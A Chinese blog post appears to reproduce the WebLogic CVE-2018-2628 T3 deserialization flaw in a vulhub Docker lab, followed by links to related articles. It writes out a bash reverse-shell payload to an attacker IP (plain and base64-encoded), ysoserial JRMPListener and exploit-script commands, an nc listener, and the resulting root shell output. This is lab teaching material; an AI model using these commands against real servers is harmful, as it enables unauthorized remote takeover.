WebLogic:CVE-2018-2628-T3协议反序列化漏洞

最新推荐文章于 2025-03-17 17:57:52 发布
最新推荐文章于 2025-03-17 17:57:52 发布
阅读量1k 收藏 8
点赞数 21
文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/h1008685/article/details/140820013
版权

漏洞成因

1、Weblogic开放控制台的7001端口,默认会开启 T3协议 服务
2、Weblogic的T3协议实现了 RMI(远程方法调用) ,在 WebLogic Server 和其他 Java 程序间传输数据
3、T3协议的缺陷触发了Weblogic Server WLS Core Components中存在的 反序列化漏洞
4、攻击者可以发送构造的恶意T3协议数据,服务器反序列化以后 执行恶意代码 ,获取到目标服务器权限
原理分析(拓展资料):
https://xz.aliyun.com/t/8073
nmap监测t3协议状态
nmap 192.168.10.5 -n -v -p 7001 --script=weblogic-t3-info

环境搭建

1.进入靶场目录

cd /vulhub-master/weblogic/CVE-2018-2628

2.开启靶场【报错重启docker服务】

[root@localhost CVE-2018-2628]# docker-compose up -d
 
3.查看靶场端口

[root@localhost CVE-2018-2628]# docker ps

 4.访问靶场

192.168.10.5:7001

复现步骤

概览:

1、kali启动JRMPListener,参数包含恶意代码,使靶机服务器连接到7777端口)
2、kali创建7777端口监听
3、运行poc.py,让漏洞服务器主动连接RMI服务器,进而下载恶意代码,建立反弹连接

详细:

1.生成指定格式payload 
bash -i >& /dev/tcp/192.168.10.128/7777 0>&1

2.kali启动JRMPListener[将步骤1生成的payload替换参数]
java版本:1.8 
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 8761 CommonsCollections1 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwLjEyOC83Nzc3IDA+JjE=}|{base64,-d}|{bash,-i}"

如果靶机连接本机 8761 端口[端口占用,切换端口],执行步骤一代码,进行反弹连接

3.监听本机端口
┌──(root㉿kali)-[~]
└─# nc -lvp 7777  
listening on [any] 7777 ...
4、kali运行运行POC(只支持Python2)[手敲,复制粘贴报错]
python2 cve-2018-2628-exp.py 靶机地址 靶机端口 ysoserial.jar 攻击机地址 步骤2端口 JRMPClient 
python2 cve-2018-2628-exp.py 192.168.10.5 7001 ysoserial-all.jar 192.168.10.128 8761 JRMPClient
5.成功连接

6.查看系统版本
uname -a 
root@bf19ddf1c321:~/Oracle/Middleware/user_projects/domains/base_domain# uname -a
<Middleware/user_projects/domains/base_domain# uname -a                      
Linux bf19ddf1c321 3.10.0-1160.95.1.el7.x86_64 #1 SMP Mon Jul 24 13:59:37 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux

漏洞利用逻辑

1.运行exp脚本,靶机接收到序列化内容
2.靶机连接攻击机 8761 端口
3.靶机与攻击机连接后,接收攻击机发送的,反弹连接的序列化内容
4.靶机执行反弹连接,与攻击机 7777 端口建立连接
Zeddm
关注
WebLogic T3 反序列化绕过漏洞(CVE-2018-2893)检测POC
IT界迷者Blog--
10-17 6995
WebLogic T3 反序列化绕过漏洞(CVE-2018-2893)检测POC #!env python # -*- coding: utf-8 -*- import socket import time import re import sys VUL=['CVE-2018-2893'] #remote ip changed to :127.0.0.1 PAYLOAD=['ACED0005...
Weblogic12c T3 协议安全漏洞分析【CVE-2020-14645 && CVE-2020-2883 && CVE-2020-14645】
weixin_45694388的博客
10-02 2291
前言 WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件。 主要用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。 近几年频繁爆发出多个RCE漏洞,而在今年,其T3协议被频繁攻击和发布补丁与绕过,本文主要对今年来由T3协议入口所产生的多个RCE漏洞进行分析,其中主要包括CVE-2020-2555、 CVE-2020-2883(bypass CVE-2020-2555补丁)、 CVE-2020
Weblogic T3协议反序列化漏洞
来日可期的博客
12-09 2209
T3协议用于在Weblogic服务器和其他类型的Java程序之间传输信息的协议Weblogic会跟踪连接到应用程序的每个Java虚拟机,要将流量传输到Java虚拟机,Weblogic会创建一个T3连接。该链接会通过消除在网络之间的多个协议来最大化效率,从而使用较少的操作系统资源。用于T3连接的协议还可以最大限度减少数据包大小,提高传输速度。
CVE重要漏洞复现之Weblogic_T3反序列化漏洞
最新发布
没有网络安全就没有国家安全
03-17 1179
CVE重要漏洞复现之Weblogic_T3反序列化漏洞
Weblogic T3协议反序列化漏洞CVE-2018-2628
Kevin's Blog
06-10 1万+
文章目录一、漏洞介绍1.1 漏洞详情1.2 基本原理1.3 影响版本二、环境搭建三、攻击过程3.1 信息收集3.2 漏洞探测3.3 攻击操作3.4 流量走向四、修复方法 一、漏洞介绍 1.1 漏洞详情   开放Weblogic控制台的7001端口,默认会开启T3协议服务,T3协议触发的Weblogic Server WLS Core Components中存在反序列化漏洞,攻击者可以发送构造的恶意T3协议数据,获取目标服务器权限。 1.2 基本原理   T3协议缺陷实现了Java虚拟机的远程方法调用(RM
Weblogic CVE-2018-2628 T3协议反序列化命令执行漏洞
读书 买花 长大
02-19 1132
CVE-2018-2628
WebLogic漏洞系列】CVE-2018-2628 WebLogic反序列化分析
blackmagic的博客
08-12 1088
WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。CVE-2018-2628是未授权的情况下远程执行(RCE)漏洞,该漏洞WebLogic Server的WLS核心组件中存在一个未授权的RMI远程攻击接口,具体存在于T3协议反序列化处理中。这里,EXP发送了多个经过Hex编码的T3协议数据包,模拟了一个正常的请求。
weblogic10.36 CVE-2018-2893补丁文件
08-02
WebLogicCVE-2018-2893安全漏洞预警,oracle官方发布了2018年4月份的关键补丁更新CPU(CriticalPatchUpdate),其中包含一个高危的Weblogic反序列化漏洞(CVE-2018-2628),因该漏洞修补不善导致被绕过。...
Weblogic反序列化漏洞(CVE-2018-2628/CVE-2023-21839)
qq_62987084的博客
10-16 1248
带你了解 Weblogic反序列化漏洞(CVE-2018-2628/CVE-2023-21839)
weblogic 反序列化 CVE-2018-2628
npc88888的博客
05-12 918
Weblogic Server中的RMI 通信使用T3协议Weblogic Server和其它Java程序(客户端或者其它Weblogic Server实例)之间传输数据, 服务器实例会跟踪连接到应用程序的每个Java虚拟机(JVM)中, 并创建T3协议通信连接, 将流量传输到Java虚拟机。T3协议在开放WebLogic控制台端口的应用上默认开启。
Weblogic反序列化远程代码执行漏洞(CVE-2018-2628) 补丁包
08-17
Oracle Fusion Middleware Oracle WebLogic Server组件安全漏洞,这个是weblogic12.1.3.0 版本的补丁包,有需要的可以下载
WebLogic T3反序列化漏洞(CVE-2018-2628)--vulhub
ccc_9wy的博客
12-10 1649
复现CVE-2018-2628漏洞;T3反序列化漏洞weblogic
Weblogic 反序列化命令执行漏洞CVE-2018-2628漏洞复现【vulhub靶场】
m0_55854679的博客
08-08 2074
WebLogic 里,攻击者利用其他rmi【远程方法调用】绕过weblogic黑名单限制,然后在将加载的内容利用readObject解析,从而造成反序列化远程代码执行该漏洞,该漏洞主要由于T3服务触发,所有开放weblogic控制台7001端口,默认会开启T3服务,攻击者发送构造好的T3协议数据,就可以获取目标服务器的权限。......
Weblogic反序列化漏洞CVE-2018-2628
weixin_46411728的博客
11-15 4222
Weblogic反序列化漏洞CVE-2018-2628
Weblogic的t3协议
mingyqf的博客
04-21 3374
漏洞复现|Weblogic反序列化命令执行漏洞(CVE-2018-2628)
weixin_42282189的博客
10-28 1482
作者:村里的小四 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 0x01 前言 NVD:Oracle 中间件的 Oracle WebLogic Server 组件(子组件:WLS 核心组件)中的漏洞漏洞允许未经身份验证的攻击者通过 T3 访问网络来破坏 Oracle WebLogic Server。 0x02 影响范围 10.3.6.0、12.1.3.0、12.2.1.2 和 12.2.1.3。 0x03 环境准备 vulhub靶场环境:CVE-2018-2628 0x0.
weblogic 使用的T3 协议
热门推荐
changyanmanman的专栏
06-30 5万+
T3也称为丰富套接字,是BEA内部协议,功能丰富,可扩展性好。T3是多工双向和异步协议,经过高度优化,只使用一个套接字和一条线程。借助这种方法,基于Java的客户端可以根据服务器方需求使用多种RMI对象,但仍使用一个套接字和一条线程。配置 T3 协议  1. 如果尚未执行此操作,请在管理控制台的更改中心中单击“锁定并编辑”。   2. 在管理控制台中,展开“环境”,然后选择“服务器”。   3.
WebLogic T3 反序列化 0day 漏洞
sqlora的专栏
04-19 1495
关闭 T3 协议或限制访问地址。 1、检查是否开启T3协议:查找应用服务器路径是否存在 /bea_wls_deployment_internal/loginUser.do (返回状态码是 200 为已开启) 2、关闭和限制方式:在连接筛选器中输入: weblogic.security.net.ConnectionFilterImpl,在连接筛选器规则中 输入: ip**allowt3 (允许通过T3协议访问的地址) 0.0.0.0/0 * deny t3 t3s (限制...
weblogic cve-2018-2628
08-15
- *1* [Weblogic T3协议反序列化漏洞CVE-2018-2628)](https://blog.csdn.net/Aaron_Miller/article/details/106657746)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值